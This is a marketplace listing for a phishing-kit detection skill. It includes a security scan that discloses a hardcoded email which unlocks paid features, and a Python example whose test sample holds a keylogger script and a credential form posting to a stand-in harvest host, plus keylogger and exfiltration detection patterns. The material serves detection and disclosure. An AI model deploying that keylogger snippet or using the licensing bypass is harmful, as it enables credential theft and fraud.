Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

EdgeIQ Phishing Kit Detector

v1.0.0

Detects phishing kit artifacts, brand impersonation, suspicious JavaScript, and infrastructure on URLs or local HTML to identify phishing kit clones.


Install

OpenClaw Prompt Flow

Install with OpenClaw

Best for remote or guided setup. Copy the exact prompt, then paste it into OpenClaw for snipercat69/edgeiq-phishing-kit-detector.

Prompt preview (Install & Setup):
Install the skill "EdgeIQ Phishing Kit Detector" (snipercat69/edgeiq-phishing-kit-detector) from ClawHub.
Skill page: https://clawhub.ai/snipercat69/edgeiq-phishing-kit-detector
Keep the work scoped to this skill only.
After install, inspect the skill metadata and help me finish setup.
Use only the metadata you can verify from ClawHub; do not invent missing requirements.
Ask before making any broader environment changes.

Command Line

CLI Commands

Use the direct CLI path if you want to install manually and keep every step visible.

OpenClaw CLI

Canonical install target

openclaw skills install snipercat69/edgeiq-phishing-kit-detector

ClawHub CLI


npx clawhub@latest install edgeiq-phishing-kit-detector

Security Scan

Capability signals

Crypto: Can make purchases

These labels describe what authority the skill may exercise. They are separate from suspicious or malicious moderation verdicts.

VirusTotal: Benign
View report →

OpenClaw: Suspicious (medium confidence)
Purpose & Capability
The code implements phishing detection functionality (URL fetch, HTML/JS analysis, brand signatures) consistent with the description. However the skill metadata declares no required env vars/config paths while the runtime uses a license file (~/.edgeiq/license.key) and an EDGEIQ_EMAIL environment variable to enable Pro/Bundle features, which is not declared in the registry metadata.
Instruction Scope
SKILL.md instructs running the scanner (including examples that set EDGEIQ_EMAIL) and to copy files into the OpenClaw skills directory. The runtime code reads files under the user's home (~/.edgeiq/*) and will fetch remote URLs (exposes the agent's IP to targets). The instructions do not explicitly document the license-file read behavior or the hardcoded developer email that grants bundle access, giving the agent/distributor discretion not disclosed in metadata.
Install Mechanism
No install spec is provided (instruction-only plus bundled Python files). There are no downloads, archive extractions, or third-party package installs in the manifest — this reduces install-time risk. The README references a GitHub repo for cloning, but the packaged files are present so no external installer is required.
Credentials
Metadata lists no required environment variables or config paths, but the code uses EDGEIQ_EMAIL and checks a per-user license file in the home directory (~/.edgeiq/license.key and related files). Additionally, the licensing code includes a hardcoded email (gpalmieri21@gmail.com) that will unlock Pro/Bundle features if that email is set, which is an unexpected and disproportionate means of elevating feature access.
Persistence & Privilege
The skill does not request 'always' presence and appears not to modify other skills or system-wide settings. It does read files from the user's home (~/.edgeiq/*) which is a persistent per-user path not declared in requirements — this is noteworthy but not an elevated privilege by itself.
What to consider before installing
This tool appears to perform the phishing scans it claims to, but there are a few red flags you should consider before installing or running it:

- Licensing/backdoor: The shipped licensing logic contains a hardcoded developer email (gpalmieri21@gmail.com) that grants Pro/Bundle features if you set EDGEIQ_EMAIL to that value. That is an unexpected backdoor for unlocking premium features and could be abused or indicate sloppy/unaudited code.
- Undeclared config access: The scanner reads a per-user license file under ~/.edgeiq/license.key and possibly other files in ~/.edgeiq, but the skill metadata declares no required config paths. If you care about privacy or potential collisions with other tools, inspect or sandbox this behavior.
- Provenance: The skill's source is listed as 'unknown' and the README points to a third-party GitHub username. If you rely on this tool for sensitive analysis, prefer packages with clear provenance, signed releases, or review the entire codebase yourself.
- Network/operational risk: The scanner will perform network requests to any URL you scan. Scanning remote sites reveals your IP and may trigger retaliatory or tracking behavior from malicious infrastructures. For risky targets, prefer offline/local HTML dumps and run the tool in an isolated environment.
- Inconsistencies: The SKILL.md, README, and included licensing code show inconsistent pricing/links and multiple variations of license-check logic. This suggests the project may have been cobbled together from versions and hasn't been audited.

Recommendations:

- Inspect the full phishing_detector.py and edgeiq_licensing.py files yourself (or have a trusted reviewer do so). The manifest includes the source; look specifically for any network calls beyond fetching the target, filesystem writes, or hardcoded external endpoints.
- Do not set EDGEIQ_EMAIL to the developer email to 'unlock' Pro features. That defeats licensing and could indicate malicious intent.
- Run the tool in a sandbox or isolated VM when testing (so the scanner's network/disk access is contained).
- Prefer a skill with a clear source repo, signed releases, or a maintainer you can verify if you plan to use it operationally.

If you want, I can (1) scan the rest of phishing_detector.py for patterns that read other sensitive files or contact unexpected endpoints, or (2) produce a short list of specific lines to inspect in the licensing module and network code.
Patterns worth reviewing

These patterns may indicate risky behavior. Check the VirusTotal and OpenClaw results above for context-aware analysis before installing.

phishing_detector.py:377: Dynamic code execution detected.


latest: vk973yz81c82ddkxvfxt2y7d75x85e9t7
15 downloads · 0 stars · 1 version · Updated 3h ago
v1.0.0 · MIT-0

Phishing Kit Detector

Skill Name: phishing-kit-detector
Version: 1.0.0
Category: Security / Phishing / OSINT
Price: Free (basic) / Pro ($19/mo) / Bundle ($39/mo)
Author: EdgeIQ Labs
OpenClaw Compatible: Yes — Python 3, pure stdlib, WSL + Linux


What It Does

Detects phishing kit artifacts, brand impersonation, form action URLs, stolen branding, suspicious JavaScript, and credential harvesting infrastructure. Analyzes live URLs or local HTML dumps to determine if a page is a phishing kit clone.

⚠️ Legal Notice: Only analyze domains you own or have explicit written authorization to audit. Not for unauthorized scanning of third-party sites.


Features

  • Phishing artifact detection — form action URLs pointing to credential capture endpoints, hidden fields, credential autocomplete
  • Brand impersonation analysis — detects brand logos, CSS frameworks, and imagery copied from legitimate sites
  • Infrastructure fingerprinting — shared/free hosting detection, suspicious TLDs, URL path patterns
  • JavaScript analysis — credential harvesting scripts, redirect chains, keyloggers, obfuscated callbacks
  • Stolen branding detection — references to legitimate brand assets, fake SSL badges, trust seals
  • URL structure analysis — phishing-specific URL path patterns (login, account, verify, secure)
  • JSON export — structured forensic report
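A minimal version of the checks listed above, as an added example written for this page and not the skill's own phishing_detector.py: it parses a constructed HTML sample with the standard library only (matching the README's "pure stdlib" claim) and reports the artifact classes the feature list names: off-site form actions, hidden credential-like fields, password autocomplete, brand references from a non-brand host, suspicious TLDs, phishing-style URL paths, and keylogger, obfuscation and exfiltration patterns in inline JavaScript. The TLD set, brand-to-domain map, keyword lists and the flat scoring weight are illustrative assumptions, and the two sample pages are constructed.

```python
"""Stdlib-only phishing-artifact scan over local HTML (added example, not the skill's code)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Illustrative assumptions, not the skill's own lists.
SUSPICIOUS_TLDS = {"tk", "ml", "ga", "cf", "gq", "ru", "xyz", "top"}
BRAND_DOMAINS = {"paypal": "paypal.com", "amazon": "amazon.com", "apple": "apple.com",
                 "google": "google.com", "microsoft": "microsoft.com"}
PHISH_PATH_WORDS = ("login", "account", "verify", "secure", "signin")
JS_PATTERNS = {
    "keylogger hook": re.compile(r"addEventListener\(\s*['\"]key(?:down|press|up)['\"]", re.I),
    "obfuscated/dynamic code": re.compile(r"\b(?:eval|atob|unescape)\s*\(", re.I),
    "outbound callback": re.compile(r"XMLHttpRequest|fetch\(|navigator\.sendBeacon", re.I),
}

# Constructed sample pages: a kit-like clone on a throwaway domain and a plain same-site login.
SAMPLE_URL = "http://paypal-secure-verify.tk/account/verify"
SAMPLE_HTML = """<html><head><title>PayPal - Log in</title>
<link rel="stylesheet" href="https://www.paypalobjects.com/web/res/app.css"></head><body>
<img src="https://www.paypalobjects.com/logo.png">
<form method="post" action="https://collect.example-harvest.ru/post.php">
  <input type="email" name="email">
  <input type="password" name="password" autocomplete="on">
  <input type="hidden" name="pin_backup">
</form>
<script>
var buf = "";
document.addEventListener('keydown', function(e){ buf += e.key; });
setInterval(function(){ fetch('/k.php', {method:'POST', body: buf}); }, 5000);
eval(atob('Ly8gb2JmdXNjYXRlZA=='));
</script></body></html>"""
BENIGN_URL = "https://accounts.example.com/login"
BENIGN_HTML = """<html><body><form action="/login" method="post">
<input type="text" name="user"><input type="password" name="password"></form></body></html>"""


class PageCollector(HTMLParser):
    """Collects <form> elements with their <input>s and the text of inline <script> blocks."""

    def __init__(self):
        super().__init__()
        self.forms, self.scripts, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.forms.append({"action": a.get("action", ""), "inputs": []})
        elif tag == "input" and self.forms:
            self.forms[-1]["inputs"].append(a)
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def analyze_page(html: str, page_url: str) -> dict:
    """Return artifact findings and a crude score for one page; works on offline HTML dumps."""
    parser = PageCollector()
    parser.feed(html)
    parsed = urlparse(page_url)
    host = (parsed.hostname or "").lower()
    findings = []

    for form in parser.forms:
        action_host = urlparse(form["action"]).hostname
        if action_host and action_host.lower() != host:
            findings.append(f"form posts credentials off-site to {action_host}")
        for inp in form["inputs"]:
            itype, name = inp.get("type", "text").lower(), inp.get("name", "").lower()
            if itype == "hidden" and any(k in name for k in ("pass", "pwd", "pin", "ssn", "otp")):
                findings.append(f"hidden field with credential-like name '{name}'")
            if itype == "password" and inp.get("autocomplete", "").lower() == "on":
                findings.append("autocomplete explicitly enabled on a password field")

    lowered = html.lower()
    for brand, legit in BRAND_DOMAINS.items():
        if brand in lowered and host != legit and not host.endswith("." + legit):
            findings.append(f"brand '{brand}' referenced from a non-{legit} host")

    tld = host.rsplit(".", 1)[-1] if "." in host else ""
    if tld in SUSPICIOUS_TLDS:
        findings.append(f"suspicious TLD .{tld}")
    if any(w in parsed.path.lower() for w in PHISH_PATH_WORDS):
        findings.append("phishing-style path segment in URL")

    js = "\n".join(parser.scripts)
    findings += [f"javascript: {label}" for label, pat in JS_PATTERNS.items() if pat.search(js)]

    score = min(100, 15 * len(findings))  # assumption: flat weight per finding
    return {"url": page_url, "findings": findings, "score": score,
            "verdict": "PHISHING KIT LIKELY" if score >= 45 else "INCONCLUSIVE"}


if __name__ == "__main__":
    import json
    print(json.dumps(analyze_page(SAMPLE_HTML, SAMPLE_URL), indent=2))
```

The example deliberately takes the HTML as a string rather than fetching it: analysing a saved dump is the mode the scan recommends for hostile targets, because a live fetch from an analyst workstation exposes its IP to the kit operator. Note the brand check's dependency on the host: a clone served from `paypal-secure-verify.tk` still references PayPal assets, so "brand mentioned" is only a signal when combined with "not the brand's registered domain".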

Tier Comparison

Feature                        Free            Pro ($19/mo)     Bundle ($39/mo)
URL scan                       ✅ (5 scans)    ✅ (50 scans)    ✅ (unlimited)
Local file scan
Brand impersonation check
JS analysis
Infrastructure fingerprinting
Stolen branding detection
JSON export

Installation

cp -r /home/guy/.openclaw/workspace/apps/phishing-kit-detector ~/.openclaw/skills/phishing-kit-detector

The source path above is the author's own workspace; replace it with the directory where you unpacked or cloned the skill. Review phishing_detector.py and the licensing module before copying them into ~/.openclaw/skills, since anything placed there runs with your user's privileges.

Usage

Basic URL scan (free tier)

python3 phishing_detector.py --url "https://suspicious-site.com/login"

Local HTML file scan (Pro)

EDGEIQ_EMAIL=your_email@gmail.com python3 phishing_detector.py \
  --file /path/to/phishing_page.html --pro

Brand impersonation check (Pro)

python3 phishing_detector.py --url "https://fake-paypal.com" \
  --brands paypal,amazon,apple --pro

Full bundle analysis + JSON export

EDGEIQ_EMAIL=your_email@gmail.com python3 phishing_detector.py \
  --url "https://phishing-site.net" --bundle --output report.json

Parameters

Flag       Type     Default   Description
--url      string             Phishing URL to analyze
--file     string             Path to local HTML file
--brands   string             Comma-separated brand list (paypal,amazon,apple,google,microsoft,facebook,instagram,twitter,netflix,linkedin)
--pro      flag     False     Enable Pro features
--bundle   flag     False     Enable Bundle features
--output   string             Write JSON report to file

Brand List

Supported brands for impersonation detection: paypal · amazon · apple · google · microsoft · facebook · instagram · twitter · netflix · linkedin · ebay · salesforce · dropbox · slack · zoom · steam · epic games · yahoo · cnn · chase · bank of america · wells fargo · capital one


Output Example

=== Phishing Kit Detector ===
Analyzing: https://fake-paypal.com/account/verify

  🔴 PHISHING KIT DETECTED (98% confidence)
  
  Artifact Analysis:
    Form action → credential harvest endpoint detected
    Hidden field → password re-entry field (credential capture)
    Credential autocomplete → enabled on sensitive fields
    Multiple forms → login + payment + PIN entry

  Brand Impersonation:
    Detected: PayPal (logo, CSS framework, brand colors)
    Stolen assets: 3 CSS files, 2 images from paypal.com
    Fake SSL badge detected

  Infrastructure:
    Free hosting provider detected (Freenom .tk domain)
    Suspicious TLD: .tk — commonly used in phishing
    Redirect chain: 2 hops before landing page
    Shared hosting IP — multiple malicious sites on same IP

  JavaScript Findings:
    Credential harvester script detected
    Keylogger injection found
    Redirect to: paypal.com.legit-site.ru

  Threat Level: CRITICAL — Sophisticated phishing kit with credential harvesting + keylogger

Pro Upgrade

Full phishing kit analysis + brand impersonation + JS analysis + infrastructure fingerprinting:

👉 Upgrade to Pro — $19/mo


Support

Open a ticket in #edgeiq-support or email gpalmieri21@gmail.com
